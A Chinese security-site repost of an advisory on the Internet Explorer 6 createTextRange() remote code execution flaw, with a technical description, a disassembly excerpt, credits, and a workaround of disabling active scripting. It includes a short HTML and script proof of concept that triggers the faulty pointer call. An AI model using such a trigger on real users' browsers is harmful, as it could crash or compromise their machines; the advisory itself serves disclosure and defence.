Microsoft Internet Explorer CreateTextRange远程代码执行漏洞

| 网站首页 | 模板 | 资料 | 源码 | 工具 | 开发 | 设计 | 安全 | 项目 | 网络 | 图片 | 系统 | 数据库 | 博客 | 会员中心 | 小说 |

网络学院

学习资料

源码模版

您现在的位置：精品下载 >> 安全 >> 网络安全 >> 安全中心正文

用户登录

新用户注册

Microsoft Internet Explorer CreateTextRange远程代码执行漏洞

【字体：小大】

Microsoft Internet Explorer CreateTextRange远程代码执行漏洞

作者：佚名安全中心来源：不详点击数：更新时间：2007-10-10

涉及程序：
Microsoft Internet Explorer CreateTextRange

描述：
Microsoft Internet Explorer CreateTextRange远程代码执行漏洞

详细：
Microsoft Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer的createTextRange()函数实现上存在漏洞，远程攻击者可能利用此漏洞在客户机器上执行任意指令。

Internet Explorer使用createTextRange()时在某些环境下可能导致无需的列表指针引用，这样在试图调用引用的32位地址时就会出现错误，如下所示：

0x7D53C15D MOV ECX, DWORD PTR DS:[EDI]
..
0x7D53C166 CALL DWORD PTR [ECX]

由于这种引用，ECX会指向很远的不存在的内存位置，导致IE崩溃，也可能执行任意指令。

<*来源：Stelian Ene （stelian.ene@gecadtech.com）
　　Joshua Heyer
　　Andreas Sandblad （sandblad@acc.umu.se）

链接：（http://www.sendmail.com/company/advisory/index.shtml
　　（http://www.computerterrorism.com/research/ct22-03-2006
　　（http://secunia.com/advisories/18680/print/
*>

受影响系统：
Microsoft Internet Explorer 6.x

攻击方法：
警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<input type="checkbox" id='c'>
<script>
　r=document.getElementById("c");
　a=r.createTextRange();
</script>

解决方案：
临时解决方法：

* 禁用不可信任用户的活动脚本。

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

（http://www.microsoft.com/windows/ie/default.asp

安全中心录入：chqnet 责任编辑：chqnet

上一个安全中心： zoo文件名处理本地缓冲区溢出漏洞

下一个安全中心： Microsoft .NET Framework SDK MSIL工具堆溢出漏洞

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关安全中心
				互联网的巨大威胁 ICMP洪水攻… Microsoft Windows 2000 Ser… 温柔的杀手—跨站ASP Script… 详解CRLF注入攻击的原理和其… Microsoft Windows帮助图形处… Microsoft Internet Explore… Microsoft .NET Framework S… Macromedia Flash Player SW… Microsoft Office 中的漏洞可… Microsoft Visual Studio DB…

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）